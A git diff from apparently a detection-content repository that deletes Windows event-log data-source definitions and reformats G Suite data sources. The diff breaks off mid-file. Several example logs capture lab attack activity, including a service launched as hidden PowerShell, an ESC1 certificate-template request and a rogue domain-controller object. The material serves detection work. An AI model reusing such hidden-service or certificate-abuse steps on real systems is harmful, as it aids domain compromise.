-example_log: 4781001382400x8020000000000000148763Securityar-win-dc.attackrange.localAR-WIN-2$AdministratorATTACKRANGEATTACKRANGE\AR-WIN-2$ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x141a04-
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
deleted file mode 100644
index 512d37cfef..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4794.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: Windows Event Log Security 4794
-fields:
-- _time
-- ActivityID
-- Caller_Domain
-- Caller_User_Name
-- CategoryString
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- Source_Workstation
-- Status
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- Workstation
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_nt_domain
-- src_nt_host
-- src_user
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- ta_windows_status
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4794001382400x8020000000000000821077Securitywin-dc-root-17044-552.attackrange.localATTACKRANGE\AdministratorAdministratorATTACKRANGE0x959c5[fe80::b907:7694:d740:91bb]0x0
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
deleted file mode 100644
index 1728e6d603..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 4798
-fields:
-- _time
-- ActivityID
-- CallerProcessId
-- CallerProcessName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: 4798001382400x8020000000000000386860Securityar-win-2.attackrange.localGuestAR-WIN-2AR-WIN-2\GuestAR-WIN-2\AdministratorAdministratorAR-WIN-20x2f4df40x1590C:\Windows\ImmersiveControlPanel\telegram\telegram.exe
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
deleted file mode 100644
index eb6b9192b9..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Windows Event Log Security 4876
-fields:
-- _time
-- ActivityID
-- BackupType
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4876001280500x802000000000000015379961Securitywin-dc-mhaag-attack-range-84.attackrange.local1S-1-5-21-2690122726-1172718210-436210976-500administratorATTACKRANGE0xeb075
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
deleted file mode 100644
index 35713b9911..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
+++ /dev/null
@@ -1,64 +0,0 @@
-event_name: Windows Event Log Security 4886
-fields:
-- _time
-- ActivityID
-- Attributes
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- RequestId
-- Requester
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4886001280500x802000000000000015379925Securitywin-dc-mhaag-attack-range-84.attackrange.local7ATTACKRANGE\administrator
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
deleted file mode 100644
index 6d4345d3a2..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
+++ /dev/null
@@ -1,67 +0,0 @@
-event_name: Windows Event Log Security 4887
-fields:
-- _time
-- ActivityID
-- Attributes
-- Channel
-- Computer
-- Disposition
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- RequestId
-- Requester
-- Subject
-- SubjectKeyIdentifier
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 4887001280500x80200000000000001830974609Securitycert_authority.attack_range.local7attack_range\attack_userCertificateTemplate:VulnerableTemplate_ESC1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
deleted file mode 100644
index c2708b5e4d..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Windows Event Log Security 5136
-fields:
-- _time
-- ActivityID
-- AppCorrelationID
-- AttributeLDAPDisplayName
-- AttributeSyntaxOID
-- AttributeValue
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- OperationType
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 5136001408100x80200000000000001997365Securitywin-dc-mvelazco-02713-392.attackrange.local{73C96723-504B-4F15-830A-F4DDB1C48F2E}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x95675attackrange.local%%14676CN=DANNIE_CERVANTES,OU=ServiceAccounts,OU=OGC,OU=Stage,DC=attackrange,DC=local{15AFB68A-679C-4F5B-AC18-4D988B3B3E44}userservicePrincipalName2.5.5.12adm/srv1.attackrange.local%%14674
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
deleted file mode 100644
index a85ca6abfa..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Windows Event Log Security 5137
-fields:
-- _time
-- AppCorrelationID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 5137001408100x8020000000000000170140Securityar-win-dc.attackrange.local{681cac8c-b5a4-48fd-be93-4339996bd94d}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x8561aattackrange.local%%14676CN={2C4C7CD3-7AA5-4E84-89B5-CE9FC75611D4},CN=Policies,CN=System,DC=attackrange,DC=local{3e7ae4de-29a6-41c1-b27c-bf9548b0444c}groupPolicyContainer
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
deleted file mode 100644
index 1d0338a8f2..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 5141
-fields:
-- _time
-- ActivityID
-- AppCorrelationID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TreeDelete
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 5141001408100x8020000000000000670908Securitywin-dc-range-02713-392.attackrange.local{A3058236-A662-445E-9BEB-DE9210B143AB}-ATTACKRANGE\AdministratorAdministratorATTACKRANGE0x978ac22attackrange.local%%14676CN=NTDS Settings,CN=WIN-HOST-ROGUE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=attackrange,DC=local{48387E55-8777-403F-BC63-2A38289A6BBF}nTDSDSA%%14679
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
deleted file mode 100644
index 56e69ac05f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
+++ /dev/null
@@ -1,117 +0,0 @@
-event_name: Windows Event Log Security 5145
-fields:
- - _time
- - AccessList
- - AccessMask
- - AccessReason
- - Caller_Domain
- - Caller_User_Name
- - Channel
- - Computer
- - Error_Code
- - EventCode
- - EventData_Xml
- - EventID
- - EventRecordID
- - Guid
- - IpAddress
- - IpPort
- - Keywords
- - Level
- - Logon_ID
- - Name
- - ObjectType
- - Opcode
- - ProcessID
- - RecordNumber
- - RelativeTargetName
- - ShareLocalPath
- - ShareName
- - Source_Port
- - Source_Workstation
- - SubjectDomainName
- - SubjectLogonId
- - SubjectUserName
- - SubjectUserSid
- - SystemTime
- - System_Props_Xml
- - Task
- - ThreadID
- - Version
- - action
- - app
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - dvc
- - dvc_nt_host
- - event_id
- - eventtype
- - file_name
- - file_path
- - host
- - id
- - index
- - linecount
- - name
- - product
- - punct
- - session_id
- - signature
- - signature_id
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - src_nt_domain
- - src_nt_host
- - src_port
- - src_user
- - status
- - subject
- - ta_windows_action
- - tag
- - tag::action
- - tag::eventtype
- - timeendpos
- - timestartpos
- - vendor
- - vendor_product
-field_mappings:
- - data_model: custom_cim
- data_set: Endpoint.Processes
- mapping:
- AccessList: access_list
- AccessMask: access_mask
- AccessReason: access_result
- RelativeTargetName: relative_target_name
- ObjectType: object_type
- IpAddress: src_ip
- IpPort: src_port
- SubjectDomainName: user_domain
- SubjectUserName: user
- SubjectLogonId: user_logon_id
- SubjectUserSid: user_sid
- ShareName: share
- - data_model: ocsf
- mapping:
- AccessList: access_list
- AccessMask: access_mask
- AccessReason: access_result
- RelativeTargetName: file.path
- ObjectType: file.type
- IpAddress: src_endpoint.ip
- IpPort: src_endpoint.port
- SubjectDomainName: actor.user.domain
- SubjectUserName: actor.user.name
- SubjectLogonId: actor.session.uid
- SubjectUserSid: actor.user.uid
- ShareName: share
-example_log: 5145001281100x80200000000000002018939Securityar-win-dc.attackrange.localANONYMOUS LOGONANONYMOUS LOGONATTACKRANGE0x13ef1bFile10.0.1.1550160\\*\SYSVOL\??\C:\Windows\SYSVOL\sysvollsarpc0x120089%%1538
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml
deleted file mode 100644
index 6374e6f659..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log System 4728
-fields:
-- _time
-- Account_Domain
-- Account_Name
-- CategoryString
-- ComputerName
-- Error_Code
-- EventCode
-- EventType
-- Keywords
-- LogName
-- Logon_ID
-- Message
-- OpCode
-- RecordNumber
-- Security_ID
-- SourceName
-- Subject_Account_Domain
-- Subject_Account_Name
-- Subject_Logon_ID
-- Subject_Security_ID
-- Target_Account_Domain
-- Target_Account_Name
-- Target_Security_ID
-- TaskCategory
-- Type
-- action
-- app
-- body
-- category
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dest_nt_host
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- member_dn
-- member_id
-- member_nt_domain
-- msad_action
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- severity
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 10/09/2020 10:41:29 AM
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
deleted file mode 100644
index c489248e4f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
+++ /dev/null
@@ -1,59 +0,0 @@
-event_name: Windows Event Log System 7036
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: 703604000x8080000000000000168530Systemar-win-dc.attackrange.localsppsvcstopped7300700070007300760063002F0031000000
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
deleted file mode 100644
index 55fc9c8100..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: Windows Event Log System 7040
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- param3
-- param4
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- start_mode
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: 704004000x8080000000000000168231Systemar-win-dc.attackrange.localPrint Spoolerdemand startdisabledSpooler
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
deleted file mode 100644
index aaad72e7bc..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: Windows Event Log System 7045
-fields:
-- _time
-- AccountName
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- ImagePath
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- ServiceType
-- StartType
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- start_mode
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: 704504000x8080000000000000168145Systemar-win-dc.attackrange.localKrbSCMpowershell.exe -WindowStyle Hiddenestno'
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
deleted file mode 100644
index 7136aa2a74..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
+++ /dev/null
@@ -1,61 +0,0 @@
-event_name: Windows Event Log TaskScheduler 200
-fields:
-- _time
-- ActionName
-- ActivityID
-- Channel
-- Computer
-- EnginePID
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- TaskInstanceId
-- TaskName
-- ThreadID
-- UserID
-- Version
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- ta_windows_action
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: 2001420010x80000000000000004323Microsoft-Windows-TaskScheduler/Operationalar-win-dc.attackrange.local\OneLinerTestTask3notepad.exe{2EE32989-FAF3-4BA3-9FB9-DB0080598F68}536
diff --git a/data_sources/endpoint/event_sources/Windows_IIS_29.yml b/data_sources/endpoint/event_sources/Windows_IIS_29.yml
deleted file mode 100644
index bd3bef5750..0000000000
--- a/data_sources/endpoint/event_sources/Windows_IIS_29.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-event_name: Windows IIS 29
-fields:
-- _time
-- ComputerName
-- EventCode
-- EventType
-- Keywords
-- LogName
-- Message
-- OpCode
-- RecordNumber
-- Sid
-- SidType
-- SourceName
-- TaskCategory
-- Type
-- User
-- name
-example_log: ''
diff --git a/data_sources/cloud/G_Suite_Drive.yml b/data_sources/g_suite_drive.yml
similarity index 53%
rename from data_sources/cloud/G_Suite_Drive.yml
rename to data_sources/g_suite_drive.yml
index affd766fee..1d32fab60e 100644
--- a/data_sources/cloud/G_Suite_Drive.yml
+++ b/data_sources/g_suite_drive.yml
@@ -1,47 +1,48 @@
name: G Suite Drive
id: 5f79120f-a235-4468-bd0d-55203758ac22
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for G Suite Drive
source: http:gsuite
sourcetype: gsuite:drive:json
supported_TA:
- name: Splunk Add-on for Google Workspace
- version: 2.6.3
+- name: Splunk Add-on for Google Workspace
url: https://splunkbase.splunk.com/app/5556
-event_names: []
+ version: 2.6.3
fields:
- - _time
- - email
- - host
- - index
- - ip_address
- - linecount
- - name
- - parameters.actor_is_collaborator_account
- - parameters.billable
- - parameters.doc_id
- - parameters.doc_title
- - parameters.doc_type
- - parameters.is_encrypted
- - parameters.new_value{}
- - parameters.old_value{}
- - parameters.old_visibility
- - parameters.originating_app_id
- - parameters.owner
- - parameters.owner_is_shared_drive
- - parameters.owner_is_team_drive
- - parameters.primary_event
- - parameters.target_user
- - parameters.visibility
- - parameters.visibility_change
- - punct
- - source
- - sourcetype
- - splunk_server
- - timestamp
- - type
- - unique_id
-example_log:
- '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
+- _time
+- email
+- host
+- index
+- ip_address
+- linecount
+- name
+- parameters.actor_is_collaborator_account
+- parameters.billable
+- parameters.doc_id
+- parameters.doc_title
+- parameters.doc_type
+- parameters.is_encrypted
+- parameters.new_value{}
+- parameters.old_value{}
+- parameters.old_visibility
+- parameters.originating_app_id
+- parameters.owner
+- parameters.owner_is_shared_drive
+- parameters.owner_is_team_drive
+- parameters.primary_event
+- parameters.target_user
+- parameters.visibility
+- parameters.visibility_change
+- punct
+- source
+- sourcetype
+- splunk_server
+- timestamp
+- type
+- unique_id
+example_log: '{"type": "acl_change", "name": "change_user_access", "parameters": {"primary_event":
true, "billable": true, "visibility_change": "none", "target_user": "alberto@internal_test_email.com",
"old_value": ["none"], "new_value": ["can_edit"], "old_visibility": "private", "doc_id":
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "doc_type": "spreadsheet", "is_encrypted":
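Review bot: The added `description: Data source object for G Suite Drive` only restates the `name` key two lines above it and tells a reader nothing about what the source carries; the same placeholder text is added in the Gmail hunk (`description: Data source object for G Suite Gmail`) and in the new github.yml. As the one free-text field in this object, it should state the event family and ingestion path that the rest of the object already implies, e.g. `description: Google Workspace Drive audit events (e.g. acl_change sharing changes), sourcetype gsuite:drive:json, ingested via the Splunk Add-on for Google Workspace`. The event family is inferred from the `"type": "acl_change"` value in the example_log, of which only the first lines are visible here.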
diff --git a/data_sources/cloud/G_Suite_Gmail.yml b/data_sources/g_suite_gmail.yml
similarity index 54%
rename from data_sources/cloud/G_Suite_Gmail.yml
rename to data_sources/g_suite_gmail.yml
index adfcde6794..3249163deb 100644
--- a/data_sources/cloud/G_Suite_Gmail.yml
+++ b/data_sources/g_suite_gmail.yml
@@ -1,86 +1,87 @@
name: G Suite Gmail
id: 706c3978-41de-406b-b6e0-75bd01e12a5d
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for G Suite Gmail
source: http:gsuite
sourcetype: gsuite:gmail:bigquery
supported_TA:
- name: Splunk Add-on for Google Workspace
- version: 2.6.3
+- name: Splunk Add-on for Google Workspace
url: https://splunkbase.splunk.com/app/5556
-event_names: []
+ version: 2.6.3
fields:
- - _time
- - action_type
- - attachment{}.file_extension_type
- - attachment{}.malware_family
- - attachment{}.sha256
- - connection_info.authenticated_domain{}.name
- - connection_info.authenticated_domain{}.type
- - connection_info.client_host_zone
- - connection_info.client_ip
- - connection_info.dkim_pass
- - connection_info.dmarc_pass
- - connection_info.dmarc_published_domain
- - connection_info.ip_geo_city
- - connection_info.ip_geo_country
- - connection_info.is_internal
- - connection_info.is_intra_domain
- - connection_info.smtp_in_connect_ip
- - connection_info.smtp_out_connect_ip
- - connection_info.smtp_out_remote_host
- - connection_info.smtp_reply_code
- - connection_info.smtp_response_reason
- - connection_info.smtp_tls_cipher
- - connection_info.smtp_tls_state
- - connection_info.smtp_tls_version
- - connection_info.smtp_user_agent_ip
- - connection_info.spf_pass
- - connection_info.tls_required_but_unavailable
- - description
- - destination{}.address
- - destination{}.rcpt_response
- - destination{}.selector
- - destination{}.service
- - destination{}.smime_decryption_success
- - destination{}.smime_extraction_success
- - destination{}.smime_parsing_success
- - destination{}.smime_signature_verification_success
- - eventtype
- - flattened_destinations
- - flattened_triggered_rule_info
- - host
- - index
- - is_policy_check_for_sender
- - is_spam
- - linecount
- - message_set{}.type
- - num_message_attachments
- - payload_size
- - punct
- - rfc2822_message_id
- - smime_content_type
- - smime_encrypt_message
- - smime_extraction_success
- - smime_packaging_success
- - smime_sign_message
- - smtp_relay_error
- - source
- - source.address
- - source.from_header_address
- - source.from_header_displayname
- - source.selector
- - source.service
- - sourcetype
- - spam_info
- - splunk_server
- - structured_policy_log_info
- - subject
- - tag
- - tag::eventtype
- - timestamp
- - upload_error_category
-example_log:
- '{"action_type": 10, "rfc2822_message_id": "",
+- _time
+- action_type
+- attachment{}.file_extension_type
+- attachment{}.malware_family
+- attachment{}.sha256
+- connection_info.authenticated_domain{}.name
+- connection_info.authenticated_domain{}.type
+- connection_info.client_host_zone
+- connection_info.client_ip
+- connection_info.dkim_pass
+- connection_info.dmarc_pass
+- connection_info.dmarc_published_domain
+- connection_info.ip_geo_city
+- connection_info.ip_geo_country
+- connection_info.is_internal
+- connection_info.is_intra_domain
+- connection_info.smtp_in_connect_ip
+- connection_info.smtp_out_connect_ip
+- connection_info.smtp_out_remote_host
+- connection_info.smtp_reply_code
+- connection_info.smtp_response_reason
+- connection_info.smtp_tls_cipher
+- connection_info.smtp_tls_state
+- connection_info.smtp_tls_version
+- connection_info.smtp_user_agent_ip
+- connection_info.spf_pass
+- connection_info.tls_required_but_unavailable
+- description
+- destination{}.address
+- destination{}.rcpt_response
+- destination{}.selector
+- destination{}.service
+- destination{}.smime_decryption_success
+- destination{}.smime_extraction_success
+- destination{}.smime_parsing_success
+- destination{}.smime_signature_verification_success
+- eventtype
+- flattened_destinations
+- flattened_triggered_rule_info
+- host
+- index
+- is_policy_check_for_sender
+- is_spam
+- linecount
+- message_set{}.type
+- num_message_attachments
+- payload_size
+- punct
